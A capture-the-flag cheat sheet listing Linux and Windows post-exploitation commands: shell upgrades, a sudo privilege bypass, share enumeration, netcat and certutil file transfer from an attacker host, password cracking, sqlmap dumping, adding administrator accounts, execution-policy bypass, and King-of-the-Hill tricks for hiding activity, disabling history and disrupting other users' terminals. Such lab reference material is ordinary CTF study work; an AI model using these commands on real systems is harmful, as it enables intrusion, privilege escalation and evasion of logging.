CTF-Writeups/Cheat Sheet.md
2020-11-10 11:01:18 -05:00

5.2 KiB

Linux

Stablilize Shell

  1. ctrl+z
  2. stty raw -echo
  3. fg (press enter x2)
  4. export TERM=xterm , for using clear command

Spawn bash

  • /usr/bin/script -qc /bin/bash 1&>/dev/null
  • python -c 'import pty;pty.spawn("/bin/bash")'
  • python3 -c 'import pty;pty.spawn("/bin/bash")'

Vulnerable sudo version

sudo -u#-1 whoami

SMB Shares

SmbClient

  • smbclient -L \\\\<ip\\ listing all shares
  • smbclient \\\\<ip>\\<share> accessing a share anonymously
  • smbclient \\\\10.10.209.122\\<share> -U <share> accessing a share with an authorized user

Smbmap

  • smbmap -u <username> -p <password> -H <ip>

Smbget

  • smbget -R smb://<ip>/<share>

NFS shares

  • showmount -e <ip> This lists the nfs shares
  • mount -t nfs <ip>:/<share_name> <directory_where_to_mount> Mounting that share

Cronjobs

  • cronjobs for specific users are stored in /var/spool/cron/cronjobs/
  • crontab -u <user> -e Check cronjobs for a specific user
  • crontab -l cronjob for the current user
  • cat /etc/crontab system wide cronjobs

Finding Binaries

  • find . - perm /4000 (user id uid)
  • find . -perm /2000 (group id guid)

Finding File capabilites

getcap -r / 2>/dev/null

Changing file attributes

chattr + i filename making file immutable
chattr -i filename making file mutable
lschattr filename Checking file attributes

Uploading Files

scp file/you/want user@ip:/path/to/store
python -m SimpleHTTPServer [port] By default will listen on 8000
python3 -m http.server [port] By default will listen on 8000

Downloading Files

wget http://<ip>:port/<file>

Netcat to download files from target

nc -l -p [port] > file Receive file
nc -w 3 [ip] [port] < file Send file

Cracaking Zip Archive

fcrackzip -u -D -p <path_to_wordlist> <archive.zip>

Decrypting PGP key

If you have asc key which can be used for PGP authentication then

  • john key.asc > asc_hash
  • john asc_hash --wordlists=path_to_wordlist

Having pgp cli

  • pgp --import key.asc
  • pgp --decrypt file.pgp

Having gpg cli

  • gpg --import key.asc
  • gpg --decrypt file.pgp

killing a running job in same shell

jobs

Find it's job number

$ jobs
[1]+  Running                 sleep 100 &

$ kill %1
[1]+  Terminated              sleep 100

SSH Port Forwarding

ssh -L <port_that_is_blockd_>:localhost:<map_blocked_port> <username>@<ip>

SQL Map

sqlmap -r request.txt --dbms=mysql --dump

Windows

Adding User

net user "USER_NAME" "PASS" /add

Changing User's password

net user "USER_NAME" "NEWPASS"

Adding User to Administrators

net localgroup administrators "USER_NAME" /add

Changing File Permissions

CACLS files /e /p {USERNAME}:{PERMISSION}
Permissions:
1.R Read
2.W Write
3.C Change
4.F Full Control

Set File bits

attrib +r filename add read only bit
attrib -r filename remove read only bit
attrib +h filename add hidden bit
attrib -h filename remove hidden bit

Show hidden file/folder

dir /a show all hidden files & folder
dir /a:d show only hidden folder
dir /a:h show only hidden files

Downloading Files

certutil.exe -urlcache -f http://<ip>:<port>/<file> ouput.exe
powershell -c "wget http://<ip>:<port>/<file>" -outfile output.exe

Active Directory

powershell -ep bypass load a powershell shell with execution policy bypassed
. .\PowerView.ps1 import the PowerView module

Msfvenom

List All Payloads

msfvenom -l payloads

List Payload Format

msfvenom --list formats

Meterpreter

Adding user for RDP

run getgui -u [USER_NAME] -p [PASS]

Git

Dumping repository

./gitdumper.sh <location_of_remote_or_local_repostiory_having./.git> <destination_folder>

Extracting information from repository

./extractor.sh <location_folder_having_.git_init> <extract_to_a_folder>

King Of The Hill (KoTH)

Monitoring and Closing Shell (Linux)

  • strace debugging / tamper with processes
  • gbd c/c++ debugger
  • script - records terminal activites
  • w /who check current pts ,terminal device
  • ps -t ps/pts-number process monitoring
  • script /dev/pts/pts-number montior terminal
  • cat /dev/urandom > /dev/pts/pts-number 2>/dev/null prints arbitary text on terminal
  • pkill -9 -t pts/pts-number

Change SSH port

nano /etc/ssh/sshd_config (change PORT 22 to any port you want also you can tinker with configuration file)

Hide yourself from "w" or "who"

ssh user@ip -T This -T will have some limiations , that you cannot run bash and some other commands but is helpful.

Run Bash script on king.txt

while [ 1 ]; do /root/chattr -i king.txt; done &

Send messages to logged in users

  • echo "msg" > /dev/pts/pts-number send message to specific user
  • wall msg boradcast message to everyone

Closing Session (Windows)

  • quser
  • logoff id|user_name

export HISTFILE=/dev/null found this it might help you out a little when doing KOTH it basically stops bash logging your commands in the ~/.bash_history file